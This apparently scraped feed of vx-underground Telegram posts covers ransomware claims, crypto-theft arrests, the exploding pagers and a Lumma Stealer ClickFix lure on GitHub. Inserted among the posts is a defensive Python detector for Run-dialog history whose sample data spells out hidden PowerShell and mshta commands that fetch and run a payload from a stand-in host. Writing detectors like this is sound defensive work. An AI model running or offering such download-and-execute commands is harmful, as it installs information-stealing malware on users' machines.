vxunderground | Unsorted

Telegram channel vxunderground - vx-underground


The largest collection of malware source, samples, and papers on the internet. Password: infected Website: https://www.vx-underground.org/ vx-underground Telegram chatroom link: https://t.me/+njfLzUrqos01ZWNh


vx-underground

Appreciation post time.

There are a lot of security researchers who have an entire career focused on tracking botnets, or information stealers, and do so for years with little to no recognition. We'd like to take a minute to shoutout a few people who we think are doing great stuff and not getting enough love and respect.

- malwrhunterteam, consistently for years tracking malware, initial access malware, and openly sharing information on it

- Max_Mal_, Cryptolaemus1 (and whoever is part of the group), JAMESWT_MHT, and 1ZRR4H, for ruthlessly tracking many of the big-name botnets and loaders and openly sharing information on them

- JaffaCakes118, and Neiki__, they both are some of the largest malware collectors and distributors. They've freely shared millions of malware samples for years.

- At-Gootloader, actively tracking Gootloader, the initial access malware used by many ransomware groups, and doing so, for free, for literally years.

- bmmaloney97, the number one expert in Windows OneDrive analysis and internals. He has openly and freely shared his research for years.

- RussianPanda9xx, for actively tracking Lumma Stealer (and tons of others), for what feels like forever, and openly sharing information and updates on the malware.

There are so many more we could shout out, but we can't think of any more off the top of our head. But your work is respected and remembered. Thank you so much for the things you do for the researchers and the world.


vx-underground

Following the arrest of Malone Iam, for his alleged theft of $243,000,000, the cryptodrainer community has shown support for Malone Iam by having videos produced requesting his freedom.

They got shirts made really fast.


vx-underground

ZachXBT continues to prove himself as a world leading expert in crypto analysis. It is remarkable how a single person can make such a profound impact.

He gave law enforcement everything they needed on a silver plate. He got them busted in less than 2 months.

tl;dr speedrun

Attached PDF is from Twitter. It is how he got 2 crypto thieves arrested for stealing $243,000,000.


vx-underground

RansomHub ransomware group claims to have ransomed Liberty First Credit Union.

Liberty First Credit Union is a small to medium sized credit union (not-for-profit bank) located in Omaha, Nebraska.


vx-underground

Oh and pagers and walkie talkies exploding. This does not fall into the realm of malware, or news we would typically discuss, but there is a high volume of people who believe this to be malware.

It's not malware. They snuck explosives into the devices.

Have a nice day.


vx-underground

If you're curious what pain looks like:

https://samples.vx-underground.org/tmp/prankware.txt


vx-underground

Just another day on Twitter

Photos via ZachXBT


vx-underground

Lockbit ransomware group claims to have ransomed eFile dot com.

eFile dot com IS NOT the IRS eFile system. eFile dot com is an IRS authorized entity approved for submitting financial documents to the IRS.


vx-underground

Update:

We found the guy who owns the MALWRE plate and he has received the sticker.


vx-underground

Oh. My. God.

The possibilities for initial access malware just went through the roof.


vx-underground

We've learned some of you don't have Xitter, or the ability to see the post, so here it is as a PDF so you don't have to do stuff.


vx-underground

We don't know much about pagers, or explosives.

But what we do know a little about is malware and we can promise you there is not some 1337 technique that magically transforms a regular battery into an incendiary device.

tl;dr modified pagers, science or something


vx-underground

"Everyone has to return to office. I only made $29,300,000 last year. How am I going to afford my new yacht on this salary?" — Andy Jassy, CEO of Amazon


vx-underground

Amazon announced starting in 2025 all workers will be expected to be back in the office.

Amazon employees jumped with joy knowing they will now have to wake up earlier, commute, waste time and money on travel, spend less time with their families, and deal with office politics!


vx-underground

It's corporate propaganda to say tech workers want to return to the office.


vx-underground

wtf are yall doing chill


vx-underground

There is an interesting psychological phenomenon whereby some Threat Actors, particularly scammers and fraudsters, falsely believe having money will make them respectable or make people like them.

Money means nothing. Materialism does not impress people — only the shallow.


vx-underground

There is no information on the impact to customers. We don't believe clients' money is gone — this isn't an attack against SWIFT. We presume this to be an attack against the institution's internal financial documents and employees.

However, we could also be completely wrong.


vx-underground

> OMG John Hammond's proof-of-concept trick is being used by Lumma stealer!!!

Us, with a giant library of malware source code and malware builders:


vx-underground

Crazy Thursday.

- Dr. Web, the Russian antivirus company, disclosed a breach. Dr. Web stopped sending antivirus updates September 16th. Subsequently, Dr. Web reportedly disconnected their servers from their internal network while they investigated the suspected compromise. Dr. Web reports having resolved the issue and returning to normal day-to-day operations. No Threat Actor has been attributed to the compromise. They believe the compromise occurred on or around September 14th.

- Yesterday, or sometime before, GitHub users were targeted en masse by a large-scale phishing and/or malware campaign. An unknown Threat Actor(s) pushed their Lumma Stealer campaign by leaving bogus issues on GitHub projects. When the project owner visited the issue, the issue linked to a domain titled 'GitHub-Scanner'. GitHub-Scanner requested the visitor prove their humanity (e.g. not a robot) by pressing Windows + R, then CTRL + V and ENTER. When the site is visited, the website copies malicious code to the user's clipboard. Windows + R opens Windows Run, CTRL + V pastes the malicious code into the Run window, and ENTER runs it, tricking the user into executing the malware payload. Once the payload is executed, it downloads a file called 'IE6.exe'. IE6.exe is Lumma information stealer. While it is a clever trick, the Threat Actor(s) (intentionally, or unintentionally) did not account for users who are not running Windows. This caused confusion for non-Windows users, or users on mobile devices.

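The Win+R lure described in the post above leaves a forensic trace the post does not mention: Explorer records every command typed into the Run dialog under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU (one value per entry, each ending in "\1", with an MRUList value giving most-recent-first order). The following is an added example, not code from vx-underground or from the campaign, that parses a constructed copy of that key and flags entries that look like pasted ClickFix payloads. The sample registry values, the `github-scanner.invalid` hostname and the scoring heuristics are this example's own assumptions; only the Windows + R / CTRL + V / ENTER flow and the IE6.exe filename come from the post.

```python
"""Flag ClickFix-style commands in Windows Run-dialog history (RunMRU).

Added example; the registry data below is constructed so the script runs
offline, and the detection rules are heuristics of this example, not of
the vx-underground post or the campaign it describes.
"""
import re
from typing import Dict, List

# Explorer stores each Win+R entry as "<command>\1"; MRUList orders the
# single-letter value names most-recent-first.
RUNMRU_SUFFIX = "\\1"

# Interpreters and download tools that Run-dialog lures typically rely on.
LAUNCHERS = re.compile(
    r"(?i)\b(powershell|pwsh|mshta|cmd|wscript|cscript|rundll32|regsvr32|"
    r"curl|bitsadmin|certutil|msiexec)(\.exe)?\b"
)
# Flags that hide the window or weaken PowerShell's safeguards.
EVASION = re.compile(
    r"(?i)(-w(indowstyle)?\s+hidden|-e(xecutionpolicy|p)\s+bypass|"
    r"-(enc|encodedcommand)\b|-nop\b|-noprofile\b)"
)
# Anything that fetches or stages a remote payload.
DOWNLOAD = re.compile(
    r"(?i)(https?://|iwr\b|invoke-webrequest|downloadstring|downloadfile|"
    r"net\.webclient|start-bitstransfer|/download\b)"
)

# Constructed sample of the RunMRU key. Hostname and commands are invented;
# only the IE6.exe filename is taken from the post.
SAMPLE_RUNMRU: Dict[str, str] = {
    "MRUList": "dcba",
    "a": r"notepad\1",
    "b": r"\\fileserver\share\1",
    "c": r'powershell -w hidden -ep bypass -c "iwr http://github-scanner.invalid/IE6.exe -OutFile $env:TEMP\IE6.exe; Start-Process $env:TEMP\IE6.exe"\1',
    "d": r"mshta https://github-scanner.invalid/verify.hta\1",
}


def parse_runmru(values: Dict[str, str]) -> List[str]:
    """Return the Run-dialog commands in most-recent-first order."""
    commands = []
    for letter in values.get("MRUList", ""):
        raw = values.get(letter)
        if raw is None:
            continue
        if raw.endswith(RUNMRU_SUFFIX):
            raw = raw[: -len(RUNMRU_SUFFIX)]
        commands.append(raw)
    return commands


def classify(command: str) -> List[str]:
    """Return the reasons a command looks like a pasted ClickFix payload."""
    reasons = []
    launcher = LAUNCHERS.search(command)
    if launcher and DOWNLOAD.search(command):
        reasons.append(f"{launcher.group(1).lower()} fetches remote content")
    if EVASION.search(command):
        reasons.append("hidden window / execution-policy bypass / encoded command")
    if len(command) > 120:
        reasons.append("unusually long for a hand-typed Run command")
    return reasons


def scan_runmru(values: Dict[str, str]) -> List[dict]:
    """Scan a RunMRU dump and return the suspicious entries with their reasons."""
    hits = []
    for position, command in enumerate(parse_runmru(values)):
        reasons = classify(command)
        if reasons:
            hits.append({"position": position, "command": command, "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in scan_runmru(SAMPLE_RUNMRU):
        print(f"[{hit['position']}] {hit['command']}")
        for reason in hit["reasons"]:
            print(f"    - {reason}")
```

On a live host the same logic applies to the output of `reg export HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU` or to the hive of every user profile on the box; a plain `cmd /k ipconfig /all` entry does not fire, while both constructed lure entries do.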

vx-underground

> have prankware idea (non-malicious malware?)
> write simple poc
> it works.png
> decided to rewrite it 1337 coo w/ no dependencies
> ...
> 841 lines of c++ later
> nowhere near done


vx-underground

we're gone for 2 hours and now people are turning butt plugs into bombs wtf

Just kidding, that didn't happen. That'd be crazy though.


vx-underground

we're gone for 30 minutes and now people are turning walkie talkies into bombs wtf


vx-underground

Actually, maybe not. Microsoft has upped the ante. It's all over.

We didn't anticipate Microsoft actually caring 😭


vx-underground

We spotted someone in California with the license plate "MALWRE".

We left a sticker on your driver side window


vx-underground

tl;dr tl;dr this guy fuckin' nailed it and we believe him to be an expert figure on hardware hacking and big brain sciency magic stuff

https://x.com/_MG_/status/1836086734171574446


vx-underground

we're gone for half a day and now people are turning pagers into bombs wtf


vx-underground

wE oFfEr fReE cOFFee

Amazon employees are making six figures. Free coffee is 100% not a make-or-break situation. Half these nerds are probably burning money on Uber Eats because they don't even want to walk to the kitchen


vx-underground

In the United States this is an actual career path. The job title is "Influencer". If done correctly you can get as much as $100,000/video by the Kremlin


vx-underground

Best places to find information on obscure parts of Windows internals:

- UnknownCheats, random guy with anime profile picture reversed it, only got 2 upvotes

- Random old blog from the mid-2000's, author stopped posting 15 years ago.

- Chinese developer forums
